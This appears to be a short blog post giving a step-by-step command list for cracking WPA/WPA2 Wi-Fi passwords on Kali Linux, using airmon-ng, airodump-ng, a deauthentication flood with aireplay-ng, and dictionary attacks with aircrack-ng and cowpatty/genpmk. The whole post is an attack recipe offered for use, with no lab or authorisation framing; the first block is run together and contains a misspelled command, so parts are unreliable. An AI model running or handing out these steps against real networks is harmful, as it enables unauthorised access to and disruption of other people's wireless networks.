Hack WPA & WPA2 USING KALI LINUX

COMMANDs TO CRACK WPA & WPA2 using kali linux:

airmon-ng 
sudo ifconfig wlan0 downsudo iwconfig wlan0 mode monitorsudo ifconfig wlan0 upairodump-ng wlan0 airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.capsudo ifconfig wlan0 downsudo iwcofnig wlan0 mode monitorsudo ifconfig wlan0 up 




crack wpa/wpa2-with-cowpatty-and-negpmk-on-kali-linux


airmon-ng 
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
airodump-ng wlan0 
airodump-ng -c [channel id] --write latesthackingnews --bssid [bssid of the wifi] wlan0
aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0

 cowpatty -f darkc0de.lst -r latesthackingnews -s [ESSID of the wifi]
genpmk -f darkc0de.lst -d pregendump -s [ESSID of the wifi]
cowpatty -d pregendump -r latesthackingnews-01.cap -s [ESSID of the wifi] 

sudo ifconfig wlan0 down
sudo iwcofnig wlan0 mode monitor
sudo ifconfig wlan0 up 

Comments

Popular posts from this blog

Activate Office 365 pro plus

Microsoft Office Pro Plus 2019

Activate Office 2019 using KMS license key